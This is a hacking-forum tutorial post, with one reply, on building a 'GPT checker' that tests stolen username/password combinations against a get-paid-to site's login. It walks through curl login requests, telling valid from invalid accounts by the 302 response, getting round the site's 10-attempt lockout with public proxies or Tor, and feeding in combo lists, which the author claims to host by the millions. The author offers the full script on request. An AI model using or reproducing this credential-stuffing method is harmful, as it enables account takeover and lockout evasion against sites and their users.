[sunjester tuts] Creating a GPT Checker

#1
[Image: https://i.imgur.com/xHwJmV0.png]

Introduction
I have been building software for over 20 years. I was building software before there was such a thing as .NET, and hell, there wasn't even PHP yet. Everyone used Perl for backend services and interactivity. Hopefully with my tutorials you will learn some badly needed basic skills. Most of the noobs today don't want anything but free money. Noobs used to aspire to be hackers; now they just aspire to leech. Break the cycle, don't be a moron your whole life, learn a little something, and above all else, keep it simple, stupid.

Required Software
All of my tutorials are written on a UNIX-based system. You can use Kali Linux if you want; almost ANY Unix-based system should work.
Unix/Linux
Lynx
CURL

Getting Websites
Using Lynx you can get a list of links from just about ANY URL. I love using Lynx for this. Lynx is a command-line browser; I use it (sometimes) daily for a variety of reasons. So let's get a list of links and pick one to attack.

Code
lynx -dump [To see links please register here]

[Image: https://i.imgur.com/TF0SjNJ.png]

Above you can see the sites in the "hidden links" section; we will just pick one.
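
For reference, the tail end of a lynx -dump looks roughly like this (illustrative output, not the real site's); the numbered list is what we will be parsing in the next section:

Code
References

   1. https://example.com/
   2. https://example.com/signup

Hidden links:
   3. https://example.com/target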

Handling Data
The biggest part of making software is simply handling data. If you can't properly handle data, then your software will probably suck ass. But let's go a step further and see if we can't just grab a shit ton of them, just for giggleshits, or for use later.

1. Download and save the links to a file named links

Code
lynx -dump [To see links please register here] >links

2. Parse the links from the file links and save them to a file named links2
Code
grep -Eo '[0-9]{1,4}\. http.+' links >links2

3. Now remove the crap before the links in the links2 file (the number and period) with the cut command, and save the results to a file named links3

Code
cut -d' ' -f2 links2 >links3

4. We can now sort and remove duplicate links from links3
Code
sort -u links3 -o links3

5. Count how many links are in our links3 file
Code
wc -l links3

6. Make it all into one command and remove the files when we are done.
Code
lynx -dump [To see links please register here] >links; grep -Eo '[0-9]{1,4}\. http.+' links >links2; cut -d' ' -f2 links2 >links3; sort -u links3 -o links3; rm links links2; cat links3
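
If you don't care about keeping the intermediate files at all, the same steps collapse into a single pipeline (a sketch, using the same hidden URL placeholder as above):

Code
lynx -dump [To see links please register here] | grep -Eo '[0-9]{1,4}\. http.+' | cut -d' ' -f2 | sort -u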

So there are a lot of links we don't need, but hopefully you learned something about handling data with Unix. Can you do all of that on a Windows command line in one line of commands? Maybe with wget, but I don't know; I don't use Windows. Maybe PowerShell has something? Who cares?

Logging Into the GPT Site
Logging into the GPT site (we are going to use an easy one for tutorial purposes) is simple with CURL. Below is the login form:

[Image: xD2X9Wv.png]

So open the source and find where the form goes.

[Image: 4N9YmRu.png]

So above in the HTML we can see the form uses the POST method to the URL /members/login.php?next. We need to check the rest of the form values, like the names they use for the username and password; these will be sent with the form's POST to the URL we just mentioned. You will also notice there is another value, next, which is a hidden element whose value is 1. The username field is named username and the password field is named password.

[Image: AwwDKx2.png]
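
Putting the values above together, the login form boils down to something like this (a reconstruction for illustration, not the site's exact markup):

Code
<form method="post" action="/members/login.php?next">
  <input type="hidden" name="next" value="1">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="submit" value="Login">
</form>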

You can also use a Chrome extension so you don't have to do this manually, but you shouldn't always rely on other people's tools; you should know the basics of how forms work, so it's good practice to look it up yourself. The next thing we need to do is make sure we have a valid account. If we don't have a valid account, we won't know what kind of response the server is going to give us for a valid account versus an invalid one. So, register a new account.

Code
curl -v --data "next=1&password=password&username=sunjester" [To see links please register here]


The CURL command above is a valid request with a valid account (user/pass). The results we get from that request and the results we get from a request with an invalid user/pass combo are quite different.

[Image: IrdszRe.png]

An invalid request simply returns a page of HTML containing the error message. We don't need to parse the "bad guy" message, as they call it in reverse engineering. Since we already know a valid login returns a 302 Found response, we can use that to determine whether we have a valid account with the current user/pass combo. Think CURL has the functionality to return the response headers? Yup, it's just a single character, -i, so now our request looks like this:

A valid request
Code
curl -i --data "next=1&password=password&username=sunjester" [To see links please register here]

[Image: YaF9SA0.png]

An invalid request

Code
curl -i --data "next=1&password=password1&username=sunjester" [To see links please register here]

[Image: h8ykpqz.png]

See the response code change? Good. Now let's save the response to a file named account.

Code
curl -i --data "next=1&password=password1&username=sunjester" [To see links please register here] >account

We can now use a tool called head, which returns the first N lines of a file. In our case, we just need the first line.

Code
head -n1 account
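
To turn that into a yes/no answer, you could grep the status line for the redirect code. A minimal sketch of the check described above:

Code
# a valid combo gets a 302 redirect; an invalid one gets the login page back
if head -n1 account | grep -q "302"; then
    echo "valid"
else
    echo "invalid"
fi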

Proxies
Okay, so apparently, after testing, we can only attempt the login 10 times before it locks us out.

[Image: XdYbUWG.png]

No worries, we can simply use proxies. It doesn't matter how slow or shitty the proxy is; we can make a script that runs while we sleep, so we don't need to monitor it. You could use Tor or just get some public proxies online from proxydb.net. It's pretty easy to use a proxy with CURL. Or you can use my proxy scraping project.

Code

[To see links please register here]
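
For reference, CURL takes a proxy with the -x flag. A sketch (the proxy address below is a placeholder, not a real proxy):

Code
# -x routes the request through a proxy; swap in a real address from your list
curl -x http://127.0.0.1:8080 -i --data "next=1&password=password&username=sunjester" [To see links please register here]
# Tor works too, via its local SOCKS listener: -x socks5h://127.0.0.1:9050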


Combo Lists
I have a GitHub with more than 17 million, and counting, combo lists.

Code

[To see links please register here]


Conclusion
I wrote this in 37 minutes. I have now given you every piece of the puzzle for creating your own GPT checker. If you can't put one together from what is here in this tutorial, don't worry, you aren't alone. There are people who won't even make it past the first paragraph. Most will turn away when they see they have to use UNIX. Those people are quitters and will NEVER be anything more than leeches to the rest of us. But if you feel that you must leech the script from me, you will have to PM me for the full script.

#2
Quote:(05-06-2019, 07:58 PM)sunjester Wrote: [snip]

Great sharing of your GitHub. I also like your Rat Museum section.


